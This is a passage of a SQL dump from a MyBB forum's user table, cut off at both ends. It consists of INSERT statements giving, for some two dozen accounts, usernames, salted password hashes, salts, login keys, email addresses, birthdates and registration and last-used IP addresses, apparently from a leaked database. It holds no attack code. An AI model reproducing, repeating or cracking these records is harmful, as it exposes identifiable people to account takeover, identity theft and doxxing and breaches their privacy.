'68.170.228.35', '68.170.228.35', '1152050211', '1152050211', '', '1131', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('330', 'Dage', 'fed34d2349b916345d9712892ce0d436', 'njECUSRq', 'YqcHEZ5T8QhFgWFIqgbzFrGPyNcNZtLOsHDjGoTKJErOV5nddr', 'tonitonitt@net.hr', '1', '', '', '', '2', '', '0', '', '1352373250', '1352373384', '1352373250', '1352373378', '', '0', '', '', '', '31-1-1992', 'all', '', '0', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '78.3.250.129', '78.3.250.129', '1308883585', '1308883585', '', '134', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('331', 'allaine99', 'c52ee2ffdae6f8143cb79f7ae8cf59f0', 'FGetyRnh', '5bwxw4PaoEqc8R7EoIkG2bAx21MigZvZsOEwnVawbbrksV8d4R', 'cebusouthnetwork@gmail.com', '0', '', '', '', '2', '', '0', '', '1352408528', '1352409541', '1352408528', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '195.60.76.223', '195.60.76.223', '-1019458337', '-1019458337', '', '1013', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('332', 'Regac Kebabistan', '383ef9bf8bb3a3191f9fbc86134c9fb0', '3gyHneKz', 'hO1V7DLw3OwdXZ9vOgEzauAlnmpgzffMa1OPm4qGY6KLgDQQDJ', 'piqueroz@gmail.com', '0', '', '', '', '2', '', '0', '', '1352412694', '1352548132', '1352443682', '0', '', '0', '', '', '', '21-9-1993', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '83.94.224.108', '2.130.82.35', '1398726764', '42095139', '', '1512', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('333', 'illest', '547be1b8f00467044fad7af64c8b3ebf', 'qr4T4MTG', '96UD4mYMgq97BlWWSt1lAIt77Z1es1MMqIDPXzK9MB47uivv3p', 'smasher7051@gmail.com', '6', '', '', '', '2', '', '0', '', '1352413278', '1352625017', '1352478459', '1352431355', '', '0', '', '', '', '30-1-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '1', '0', '65.102.190.80', '71.231.38.67', '1097252432', '1206330947', '', '3864', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('334', 'Centagon', 'be5b96c55464b2eedf22ee83227e3d93', 'XRXgJI2a', 'ps2nZVu9u7ljc6LSeqOIMWH4m9eUVOCPHOrWEaNZorZ4bpVShs', 'Centagon@outlook.com', '2', '', '', '', '2', '', '0', '', '1352431527', '1352812100', '1352793668', '1352785934', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '333', '0', '0', '107.205.69.168', '107.205.69.168', '1808614824', '1808614824', '', '7380', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('335', 'loser386', '9afb6a8fa1996057847276d652f7c0dd', 'igwfpicB', 'nEgjTpbqtgUp8mXGOpOEryup13nCAcP8btoMIvrq5Dd2oRSUO9', 'failed.project@yahoo.com', '1', '', '', '', '2', '', '0', '', '1352449441', '1352454409', '1352452397', '1352452340', '', '0', '', '', '', '21-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '110.36.19.190', '110.36.19.190', '1847858110', '1847858110', '', '535', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('336', 'GoodBoy', '5371a360416d62c039669709b4a15674', 'ma9zSLUU', 'bZBYhvSXoFgACENsxF8YabOmU8KtBwI5DszjGnlJdNaZ3VhJHD', 'mr.smithivan@gmail.com', '0', '', '', '', '2', '', '0', '', '1352468655', '1352470846', '1352469487', '0', '', '0', '', '', '', '28-9-1979', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '0', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.0.114.45', '94.0.114.45', '1577087533', '1577087533', '', '1160', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('337', 'm4dh4ck3r', '77fd02d4069bd300cdbad942dec10fd5', 'XlTCdKjY', 'mn9HModUWG9GcmfdOZa8V7CoBFHoGTAYtAtU9cZyNSHJ6Vr6iv', 'superhero619@gmail.com', '0', '', '', '', '2', '', '0', '', '1352490604', '1352490604', '1352490604', '0', '', '0', '', '', '', '19-7-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '61', '0', '0', '122.174.92.160', '', '2058247328', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('338', 'TauAssassin', '498e3e56705bf535126eafccdd19973a', 'P8RDkQMU', 'hvXqoNNVSRCNg2FcVcCFIyKyWfu93JjFzLuNqiO3qCl3UbO3nR', 'tau_assassin@hotmail.com', '0', '', '', '', '2', '', '0', '', '1352504112', '1352504168', '1352504112', '0', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '173.206.71.165', '173.206.71.165', '-1378990171', '-1378990171', 'english', '56', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('339', 'A??????™', 'f3902ee245c3e66783cd4f043c13ea16', 'Qhmla5dJ', 'BhTQhxeaRG9jCBNFEtcMnY5FIXKfoglUr8jsTBmLqNCkpQzvSk', 'anthraxx@live.co.uk', '0', '', '', '', '2', '', '0', '', '1352508374', '1352517104', '1352511920', '0', '', '0', '', '', '', '4-1-1994', 'all', '', '1', '0', '2', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '81.96.99.120', '81.96.99.120', '1365271416', '1365271416', '', '111', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('341', 'bouabda', 'e5c74874d0218818b39ccd2f10627bb2', 'ddC3eD9O', 'oWRM2YP2XopW3wNnZsoPyx6UtouLihiPNLXm9CWK6jgTfO9Rah', 'waelbouabda@gmail.com', '2', '', '', '', '2', '', '0', '', '1352555145', '1352555731', '1352555145', '1352555433', '', '0', '', '', '', '17-10-1992', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '197.6.136.191', '197.6.136.191', '-989427521', '-989427521', '', '586', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('340', 'EliteDanz', '201d5478ac17a8916c6b324008a2a8b9', 'jvxlfjZl', '21jx4YZv8E1XKrRNeNEVNkwTaEuCOLaSkSCKL11h6dwc3VvoQW', 'danny_smith2026@yahoo.co.uk', '0', '', '', '', '2', '', '0', '', '1352544776', '1352544963', '1352544776', '0', '', '0', '', '', '', '16-3-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.13.75.42', '94.13.75.42', '1577929514', '1577929514', '', '187', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('342', 'Squirt1971', 'c5b6106fefff3ed4ddb2e460b168b72f', 'fsEVSUpR', 'i43afoDxgbsuDasLe5dD8ALQ1yd5rz87LPQ9ltRl2tbUL4no6L', 'basketball8001@hotmail.com', '4', '', '', '', '2', '', '0', '', '1352571709', '1352808846', '1352772277', '1352606030', '', '0', '', '', '', '5-6-1990', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '96.21.227.16', '96.21.227.16', '1612047120', '1612047120', '', '1510', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('345', 'ZetaHunter', 'b3c96b4444232fd9572599272e3d1e50', 'D82ssS4O', 'lX1xvy1VwXToU3H4QvWfWteMvlqRJK6F1z1wovJnNPu2LRuVB4', 'nirajneek@gmail.com', '1', '', '', '', '2', '', '0', '', '1352654797', '1352656392', '1352654797', '1352654955', '', '0', '', '', '', '24-12-1981', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '116.203.56.36', '116.203.56.36', '1959475236', '1959475236', '', '1595', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('343', 'vashafi', 'dc95c20c2e33c735e837fd3584b2c885', 'dryenown', '1xaA7VUGiJcQBAFMCM979jSs5iV4GengbIqERri4OyhTpDurl3', 'vashafi@gmail.com', '0', '', '', '', '2', '', '0', '', '1352608808', '1352609966', '1352608808', '0', '', '0', '', '', '', '1-10-1987', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '14.194.176.168', '14.194.176.168', '247640232', '247640232', '', '1158', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, 